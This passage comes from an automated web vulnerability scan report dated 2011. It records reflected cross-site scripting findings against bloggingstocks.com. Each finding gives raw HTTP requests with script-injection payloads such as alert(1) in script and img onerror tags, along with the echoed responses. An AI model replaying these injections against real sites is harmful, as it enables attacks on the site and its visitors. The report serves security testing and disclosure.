Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 104756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
s.pf";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,bloggingstocks.com";
s_265.mmxgo = true;
s_265.prop1="BloggingStocks";
s_265.prop2="Home";
s_265.prop12="http://www.bloggingstocks.com/?f020e"-alert(1)-"014356e96ab=1";
s_265.prop16="BloggingStocks";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.253. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218f9"><script>alert(1)</script>7dcb406a603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?218f9"><script>alert(1)</script>7dcb406a603=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 104831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
<link rel="canonical" href="http://www.bloggingstocks.com/?218f9"><script>alert(1)</script>7dcb406a603=1"/>
...[SNIP]...

1.254. http://www.bloggingstocks.com/category/stocks-to-buy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /category/stocks-to-buy/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0 was submitted in the REST URL parameter 2. This input was echoed as 898c0"><img src=a onerror=alert(1)>608c32bafe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/stocks-to-buy898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0/ HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en<